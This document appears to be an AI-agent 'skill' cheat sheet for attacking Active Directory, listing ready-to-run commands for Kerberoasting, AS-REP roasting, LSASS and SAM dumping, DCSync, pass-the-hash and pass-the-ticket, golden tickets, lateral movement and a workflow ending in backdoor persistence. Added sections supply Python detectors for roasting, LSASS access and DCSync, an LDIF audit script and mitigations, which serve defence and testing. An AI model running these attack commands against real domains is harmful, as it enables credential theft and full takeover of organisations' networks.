Attacking Active Directory

When to Use

  • AD reconnaissance and enumeration
  • Kerberos-based attacks
  • Credential dumping from domain controllers
  • Lateral movement within domains
  • BloodHound attack path analysis
  • Domain persistence techniques

Kerberoasting

Windows:

# Check kerberoastable users
.\Rubeus.exe kerberoast /stats

# Roast all
.\Rubeus.exe kerberoast /outfile:hashes.txt

# Target specific user
.\Rubeus.exe kerberoast /user:svc_mssql /outfile:hashes.txt

# Target admins only
.\Rubeus.exe kerberoast /ldapfilter:'(admincount=1)' /nowrap

Linux:

# Impacket GetUserSPNs
GetUserSPNs.py -request -dc-ip 10.10.10.10 domain.local/user:password -outputfile hashes.txt

# With NT hash
GetUserSPNs.py -request -dc-ip 10.10.10.10 -hashes :ntlmhash domain.local/user -outputfile hashes.txt

# Target specific user
GetUserSPNs.py -request-user svc_mssql -dc-ip 10.10.10.10 domain.local/user:password

Crack Hashes:

# Hashcat (TGS-REP)
hashcat -m 13100 hashes.txt wordlist.txt

# John
john --wordlist=wordlist.txt hashes.txt

ASREPRoasting

Windows:

# Enumerate vulnerable users
Get-DomainUser -PreauthNotRequired

# Roast
.\Rubeus.exe asreproast /format:hashcat /outfile:hashes.txt
.\Rubeus.exe asreproast /user:victim /format:hashcat

Linux:

# With domain creds
GetNPUsers.py domain.local/user:password -request -format hashcat -outputfile hashes.txt

# Without creds (username list)
GetNPUsers.py domain.local/ -usersfile users.txt -format hashcat -outputfile hashes.txt -dc-ip 10.10.10.10

Crack AS-REP:

hashcat -m 18200 hashes.txt wordlist.txt
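Detection logic for the two roasting techniques above (Kerberoasting and AS-REP roasting), added here as an example and not part of the original skill file. It runs over constructed Windows Security events from a domain controller: 4769 (TGS request) and 4768 (TGT request). The field names follow the event XML; the records, the 60-second window and the five-service threshold are assumptions to tune per environment.

```python
"""Detect Kerberoasting and AS-REP roasting patterns in DC Security events.

Added example, not from the original page. Events below are constructed.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17      # TicketEncryptionType 0x17: RC4-HMAC, what roasting tools ask for
AES256 = 0x12        # TicketEncryptionType 0x12: AES256, the modern client default
PREAUTH_NONE = 0     # PreAuthType 0: TGT issued without pre-authentication

# Constructed sample events: one requester pulls many RC4 service tickets within
# seconds (roasting signature), and one TGT is issued without pre-authentication.
EVENTS = [
    {"EventID": 4769, "Time": "2024-05-01T10:00:01", "TargetUserName": "alice@DOMAIN.LOCAL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": AES256, "IpAddress": "10.10.10.50"},
    {"EventID": 4769, "Time": "2024-05-01T10:00:05", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "svc_mssql", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.10.77"},
    {"EventID": 4769, "Time": "2024-05-01T10:00:06", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "svc_http", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.10.77"},
    {"EventID": 4769, "Time": "2024-05-01T10:00:07", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "svc_backup", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.10.77"},
    {"EventID": 4769, "Time": "2024-05-01T10:00:08", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "svc_sql2", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.10.77"},
    {"EventID": 4769, "Time": "2024-05-01T10:00:09", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "svc_web", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.10.77"},
    {"EventID": 4769, "Time": "2024-05-01T10:00:10", "TargetUserName": "bob@DOMAIN.LOCAL",
     "ServiceName": "krbtgt", "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.10.77"},
    {"EventID": 4768, "Time": "2024-05-01T10:01:00", "TargetUserName": "victim",
     "PreAuthType": PREAUTH_NONE, "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.10.77"},
    {"EventID": 4768, "Time": "2024-05-01T10:01:30", "TargetUserName": "carol",
     "PreAuthType": 2, "TicketEncryptionType": AES256, "IpAddress": "10.10.10.51"},
]


def _ts(ev):
    return datetime.fromisoformat(ev["Time"])


def detect_kerberoasting(events, window_seconds=60, min_services=5):
    """Flag requesters that obtain RC4 service tickets for many distinct SPNs in a short window.

    A single RC4 ticket is not suspicious on its own (legacy services exist); the
    combination of RC4 plus a burst of distinct service names from one account
    and source address is what tools like Rubeus and GetUserSPNs produce.
    """
    by_requester = defaultdict(list)
    for ev in sorted(events, key=_ts):
        if ev["EventID"] != 4769 or ev["TicketEncryptionType"] != RC4_HMAC:
            continue
        svc = ev["ServiceName"]
        if svc.lower() == "krbtgt" or svc.endswith("$"):
            continue  # TGT renewals and machine accounts (random passwords) are not roast targets
        by_requester[(ev["TargetUserName"], ev["IpAddress"])].append((_ts(ev), svc))
    window = timedelta(seconds=window_seconds)
    hits = []
    for (user, ip), reqs in sorted(by_requester.items()):
        for i, (start, _) in enumerate(reqs):
            services = {svc for t, svc in reqs[i:] if t - start <= window}
            if len(services) >= min_services:
                hits.append({"user": user, "ip": ip, "services": sorted(services)})
                break
    return hits


def detect_asrep_roasting(events):
    """Flag TGTs issued without pre-authentication AND encrypted with RC4.

    An account marked DONT_REQ_PREAUTH logs PreAuthType 0 on every legitimate
    logon as well, so the RC4 downgrade is the discriminating signal: current
    Windows clients negotiate AES, while roasting tools request RC4 so the
    AS-REP is cheap to crack offline.
    """
    return sorted(
        (ev["TargetUserName"], ev["IpAddress"])
        for ev in events
        if ev["EventID"] == 4768
        and ev["PreAuthType"] == PREAUTH_NONE
        and ev["TicketEncryptionType"] == RC4_HMAC
    )


if __name__ == "__main__":
    for hit in detect_kerberoasting(EVENTS):
        print("possible Kerberoasting:", hit["user"], "from", hit["ip"], "->", hit["services"])
    for user, ip in detect_asrep_roasting(EVENTS):
        print("possible AS-REP roast: TGT for", user, "without preauth from", ip)
```

The corresponding mitigations are on the account side: long random passwords or gMSAs for SPN-bearing accounts, AES-only msDS-SupportedEncryptionTypes so RC4 tickets are never issued, and no user left with "Do not require Kerberos preauthentication" set.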

BloodHound

Data Collection:

# Windows - SharpHound
.\SharpHound.exe -c All --zipfilename output.zip
.\SharpHound.exe -c All,GPOLocalGroup

Linux:

# bloodhound-python
bloodhound-python -u user -p password -ns 10.10.10.10 -d domain.local -c All --zip

Useful Queries:

# Shortest path to Domain Admins
MATCH p=shortestPath((n)-[*1..]->(m:Group {name:'DOMAIN ADMINS@DOMAIN.LOCAL'})) RETURN p

# Kerberoastable users
MATCH (u:User {hasspn:true}) RETURN u

# AS-REP Roastable
MATCH (u:User {dontreqpreauth:true}) RETURN u

# Unconstrained delegation
MATCH (c:Computer {unconstraineddelegation:true}) RETURN c

# DCSync rights
MATCH p=(n)-[:DCSync|AllExtendedRights|GenericAll]->(d:Domain) RETURN p

Credential Dumping

LSASS Dumping:

# Task Manager: Right-click lsass.exe -> Create dump file

# procdump
procdump.exe -accepteula -ma lsass.exe lsass.dmp

# comsvcs.dll
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <LSASS_PID> C:\Temp\lsass.dmp full

# Parse offline with mimikatz
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
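The LSASS dumping methods above (Task Manager, procdump, comsvcs.dll MiniDump, mimikatz) all have to open a handle to lsass.exe with memory-read rights, which is what a Sysmon Event ID 10 (ProcessAccess) rule catches. The rule below is an added example, not from the original skill file; the Sysmon records and the source-image allowlist are constructed assumptions, and the allowlist in particular must be tuned per environment.

```python
"""Classify Sysmon Event ID 10 (ProcessAccess) records that target lsass.exe.

Added example, not from the original page. Records below are constructed.
"""

PROCESS_VM_READ = 0x0010          # required to read LSASS memory at all
PROCESS_ALL_ACCESS = 0x1FFFFF     # what procdump and Task Manager request
DUMP_LIBRARIES = ("dbghelp.dll", "dbgcore.dll")   # MiniDumpWriteDump lives here

# Processes that legitimately open LSASS with VM_READ; constructed allowlist.
ALLOWED_SOURCES = {
    r"c:\windows\system32\svchost.exe",
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

LSASS = r"C:\Windows\System32\lsass.exe"
NTDLL = r"C:\Windows\SYSTEM32\ntdll.dll+9d204"

# Constructed Sysmon 10 records in the order: benign query, procdump,
# comsvcs-style rundll32, allowlisted system process, unknown reader.
EVENTS = [
    {"SourceImage": r"C:\Windows\System32\svchost.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1000", "CallTrace": NTDLL},
    {"SourceImage": r"C:\Tools\procdump.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": NTDLL + r"|C:\Tools\dbgcore.dll+2a1b"},
    {"SourceImage": r"C:\Windows\System32\rundll32.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1fffff", "CallTrace": NTDLL + r"|C:\Windows\System32\dbghelp.dll+ffff"},
    {"SourceImage": r"C:\Windows\System32\wininit.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1410", "CallTrace": NTDLL},
    {"SourceImage": r"C:\Users\j\x.exe", "TargetImage": LSASS,
     "GrantedAccess": "0x1010", "CallTrace": NTDLL},
]


def classify(ev):
    """Return None for benign access or a severity string for one ProcessAccess event."""
    if not ev["TargetImage"].lower().endswith("\\lsass.exe"):
        return None
    access = int(ev["GrantedAccess"], 16)
    if not access & PROCESS_VM_READ:
        return None                 # cannot read memory, so not a dump
    if ev["SourceImage"].lower() in ALLOWED_SOURCES:
        return None
    trace = ev["CallTrace"].lower()
    if any(lib in trace for lib in DUMP_LIBRARIES):
        return "high"               # minidump API present in the call stack
    if access == PROCESS_ALL_ACCESS:
        return "medium"             # full access from an unknown process
    return "low"                    # VM_READ from an unknown process (e.g. 0x1010)


def scan(events):
    """Return (source image, severity) for every record that classify() flags."""
    flagged = []
    for ev in events:
        severity = classify(ev)
        if severity:
            flagged.append((ev["SourceImage"], severity))
    return flagged


if __name__ == "__main__":
    for source, severity in scan(EVENTS):
        print(f"{severity:6} {source}")
```

Preventive controls reduce how much such a dump yields: LSA protection (RunAsPPL) blocks unsigned processes from opening LSASS, and Credential Guard keeps NT hashes and Kerberos keys out of the LSASS process entirely.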

SAM Dumping:

# Save hives
reg save HKLM\SAM sam.hive
reg save HKLM\SYSTEM system.hive

# Extract hashes (Linux)
secretsdump.py -sam sam.hive -system system.hive LOCAL

DCSync (Domain):

# secretsdump - dump all
secretsdump.py domain.local/user:password@dc.domain.local -just-dc

# Specific user
secretsdump.py domain.local/user:password@dc.domain.local -just-dc-user krbtgt

# With NTLM hash
secretsdump.py -hashes :ntlmhash domain.local/user@dc.domain.local -just-dc
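DCSync works by exercising the directory replication control-access rights, so on a domain controller it surfaces as Security event 4662 naming those rights in its Properties field. The detector below is an added example (not from the original skill file) over constructed 4662 records; it assumes "Audit Directory Service Access" is enabled with a SACL on the domain object covering those rights, and the DC and sync-account lists are constructed placeholders to fill from your own inventory.

```python
"""Flag DCSync-style replication requests in Windows Security event 4662 records.

Added example, not from the original page. Records below are constructed.
"""
import re

# Control-access-right GUIDs from the AD schema that replication (and DCSync) uses.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Principals expected to replicate: DC computer accounts and, for example, an
# Azure AD / Entra Connect service account. Constructed; populate from inventory.
DOMAIN_CONTROLLERS = {"DC01$", "DC02$"}
ALLOWED_SYNC_ACCOUNTS = {"svc_aadconnect"}

DOMAIN_OBJECT = "%{00000000-0000-0000-0000-000000000001}"   # constructed domain object GUID

# Constructed 4662 records: a DC, a sync account, a user, and a user with read-only rights.
EVENTS = [
    {"SubjectUserName": "DC01$", "ObjectName": DOMAIN_OBJECT, "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "svc_aadconnect", "ObjectName": DOMAIN_OBJECT, "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "jsmith", "ObjectName": DOMAIN_OBJECT, "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"SubjectUserName": "auditor", "ObjectName": DOMAIN_OBJECT, "AccessMask": "0x100",
     "Properties": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}"},
]


def replication_rights(ev):
    """Names of the replication rights referenced in the event's Properties field."""
    return sorted(
        REPLICATION_RIGHTS[g.lower()]
        for g in GUID_RE.findall(ev["Properties"])
        if g.lower() in REPLICATION_RIGHTS
    )


def detect_dcsync(events, dcs=DOMAIN_CONTROLLERS, allowlist=ALLOWED_SYNC_ACCOUNTS):
    """Return replication requests from principals that are not expected to replicate."""
    hits = []
    for ev in events:
        rights = replication_rights(ev)
        # Get-Changes alone does not return secrets; Get-Changes-All is the one that matters.
        if "DS-Replication-Get-Changes-All" not in rights:
            continue
        subject = ev["SubjectUserName"]
        if subject in dcs or subject in allowlist:
            continue
        hits.append({"subject": subject, "rights": rights, "object": ev["ObjectName"]})
    return hits


if __name__ == "__main__":
    for hit in detect_dcsync(EVENTS):
        print("possible DCSync by", hit["subject"], "with", hit["rights"])
```

Matching on the explicit DC list rather than on a trailing `$` matters: a compromised computer account that has been granted replication rights would otherwise be skipped. The BloodHound DCSync query earlier on this page is the offline counterpart, showing which principals hold these rights before anyone uses them.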

Pass-the-Hash

Windows:

# Mimikatz
sekurlsa::pth /user:administrator /domain:domain.local /ntlm:hash /run:cmd.exe

Linux:

# CrackMapExec
crackmapexec smb 10.10.10.10 -u administrator -H hash
crackmapexec smb 10.10.10.10 -u administrator -H hash -x whoami

# psexec
psexec.py -hashes :hash administrator@10.10.10.10

# wmiexec
wmiexec.py -hashes :hash administrator@10.10.10.10

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -H hash

Pass-the-Ticket

Export Tickets:

# Mimikatz
sekurlsa::tickets /export

# Rubeus
.\Rubeus.exe dump /nowrap
.\Rubeus.exe monitor /interval:10

Import/Use Tickets:

# Mimikatz
kerberos::ptt ticket.kirbi

# Rubeus
.\Rubeus.exe ptt /ticket:base64ticket

# Verify
klist

Linux PtT:

# Convert kirbi to ccache
ticketConverter.py ticket.kirbi ticket.ccache

# Set ticket
export KRB5CCNAME=ticket.ccache

# Use ticket
psexec.py -k -no-pass domain.local/administrator@dc.domain.local

Overpass-the-Hash

# Rubeus - request TGT with NTLM hash
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /rc4:hash /ptt

# With AES key (better OPSEC)
.\Rubeus.exe asktgt /user:administrator /domain:domain.local /aes256:key /ptt

Golden/Silver Tickets

Golden Ticket (TGT):

# Requirements: krbtgt hash, Domain SID

# Mimikatz
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /krbtgt:hash /ptt

# Rubeus
.\Rubeus.exe golden /rc4:hash /user:administrator /domain:domain.local /sid:S-1-5-21-... /ptt

Silver Ticket (TGS):

# Requirements: Service account hash, Service SPN

# Mimikatz - CIFS service
kerberos::golden /user:administrator /domain:domain.local /sid:S-1-5-21-... /target:dc.domain.local /service:cifs /rc4:hash /ptt

Lateral Movement

CrackMapExec:

# SMB spray
crackmapexec smb 10.10.10.0/24 -u user -p password

# Execute commands
crackmapexec smb 10.10.10.10 -u admin -p password -x whoami
crackmapexec smb 10.10.10.10 -u admin -H hash -x whoami

# Dump SAM
crackmapexec smb 10.10.10.10 -u admin -p password --sam

# Dump LSA
crackmapexec smb 10.10.10.10 -u admin -p password --lsa

PSExec Variants:

# psexec
psexec.py domain/user:password@10.10.10.10

# wmiexec (stealthier)
wmiexec.py domain/user:password@10.10.10.10

# smbexec (no service)
smbexec.py domain/user:password@10.10.10.10

WinRM:

# PowerShell
Enter-PSSession -ComputerName dc.domain.local -Credential domain\user

# evil-winrm
evil-winrm -i 10.10.10.10 -u administrator -p password
evil-winrm -i 10.10.10.10 -u administrator -H hash

Enumeration

Domain Info:

# PowerView
Get-Domain
Get-DomainController
Get-DomainUser
Get-DomainComputer
Get-DomainGroup
Get-DomainGroupMember "Domain Admins"

Linux Enumeration:

# crackmapexec
crackmapexec smb 10.10.10.0/24 -u user -p password --users
crackmapexec smb 10.10.10.0/24 -u user -p password --groups

# ldapsearch
ldapsearch -x -H ldap://10.10.10.10 -D 'user@domain.local' -w 'password' -b "DC=domain,DC=local"
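The ldapsearch command above returns LDIF, and the same attributes the BloodHound queries earlier on this page key on (SPNs, DONT_REQ_PREAUTH, unconstrained delegation) are readable straight from it. The parser and audit below are an added example, not from the original skill file, so a defender can review their own directory export without importing it into BloodHound. The LDIF is constructed; the userAccountControl bit values are the documented ones.

```python
"""Parse LDIF as emitted by ldapsearch and flag roastable / delegation-capable accounts.

Added example, not from the original page. The LDIF sample is constructed.
"""
import base64

# Documented userAccountControl bits.
UAC_FLAGS = {
    "ACCOUNTDISABLE": 0x0002,
    "DONT_EXPIRE_PASSWORD": 0x10000,
    "TRUSTED_FOR_DELEGATION": 0x80000,   # unconstrained delegation
    "DONT_REQ_PREAUTH": 0x400000,        # AS-REP roastable
}

# Constructed export: 66048 = NORMAL_ACCOUNT|DONT_EXPIRE_PASSWORD,
# 4260352 adds DONT_REQ_PREAUTH, 528384 = WORKSTATION_TRUST_ACCOUNT|TRUSTED_FOR_DELEGATION.
SAMPLE_LDIF = """\
# extended LDIF
dn: CN=svc_mssql,OU=Service Accounts,DC=domain,DC=local
sAMAccountName: svc_mssql
userAccountControl: 66048
servicePrincipalName: MSSQLSvc/sql01.domain.local:1433
servicePrincipalName: MSSQLSvc/sql01.domain.local
adminCount: 1

dn: CN=victim,CN=Users,DC=domain,DC=local
sAMAccountName: victim
userAccountControl: 4260352
description:: QVMtUkVQIHRlc3QgYWNjb3VudA==

dn: CN=WEB01,CN=Computers,DC=domain,DC=local
sAMAccountName: WEB01$
userAccountControl: 528384
servicePrincipalName: HOST/web01.domain.local

dn: CN=carol,CN=Users,DC=domain,DC=local
sAMAccountName: carol
userAccountControl: 512

search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Return one dict per entry with a dn; repeated attributes become lists.

    Handles LDIF line folding (continuation lines start with a space) and
    base64 values (attribute followed by '::'); comment lines are skipped.
    """
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]          # unfold
        else:
            lines.append(raw)
    entries, current = [], {}
    for line in lines + [""]:             # trailing "" flushes the last entry
        if not line.strip():
            if "dn" in current:
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        attr, _, value = line.partition(":")
        value = value.strip()
        if value.startswith(":"):         # "attr:: base64"
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(attr.strip(), []).append(value)
    return entries


def audit(entries):
    """Map sAMAccountName to a list of findings for enabled accounts with issues."""
    findings = {}
    for e in entries:
        sam = e.get("sAMAccountName", ["?"])[0]
        uac = int(e.get("userAccountControl", ["0"])[0])
        if uac & UAC_FLAGS["ACCOUNTDISABLE"]:
            continue
        issues = []
        if uac & UAC_FLAGS["DONT_REQ_PREAUTH"]:
            issues.append("AS-REP roastable: DONT_REQ_PREAUTH set")
        if uac & UAC_FLAGS["TRUSTED_FOR_DELEGATION"]:
            issues.append("unconstrained delegation: TRUSTED_FOR_DELEGATION set")
        # Computer accounts always carry SPNs but have random passwords; only user SPNs matter.
        if "servicePrincipalName" in e and not sam.endswith("$"):
            issues.append("Kerberoastable: user account with SPN")
            if uac & UAC_FLAGS["DONT_EXPIRE_PASSWORD"]:
                issues.append("password never expires")
        if issues and e.get("adminCount", ["0"])[0] == "1":
            issues.append("adminCount=1 (privileged)")
        if issues:
            findings[sam] = issues
    return findings


if __name__ == "__main__":
    for sam, issues in audit(parse_ldif(SAMPLE_LDIF)).items():
        print(sam, "->", "; ".join(issues))
```

Running it against a real export needs the attributes in the filter (`(objectClass=user)` with `sAMAccountName`, `userAccountControl`, `servicePrincipalName`, `adminCount`); the findings map directly onto the fixes: remove the preauth exemption, move service accounts to gMSAs, and replace unconstrained with constrained or resource-based delegation.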

Quick Workflow

  1. Initial Access → Get domain credentials
  2. Enumeration → Run BloodHound collection
  3. Kerberoasting → Extract and crack service tickets
  4. Lateral Movement → Use creds to move to high-value targets
  5. Credential Dumping → Dump LSASS/SAM on compromised hosts
  6. DCSync → Extract all domain hashes from DC
  7. Persistence → Golden ticket or create backdoor accounts

Common Wins

  • Kerberoasting weak service account passwords
  • ASREPRoasting accounts without preauth
  • BloodHound finding short paths to DA
  • Pass-the-Hash from dumped credentials
  • DCSync with compromised accounts that have replication rights

Tools

  • Rubeus - Kerberos attacks (Windows)
  • Mimikatz - Credential dumping (Windows)
  • Impacket - Comprehensive toolkit (Linux)
  • BloodHound - AD relationship graphing
  • CrackMapExec - Swiss army knife for AD
  • PowerView - AD enumeration (PowerShell)
  • evil-winrm - WinRM access (Linux)

Repository: smithery/ai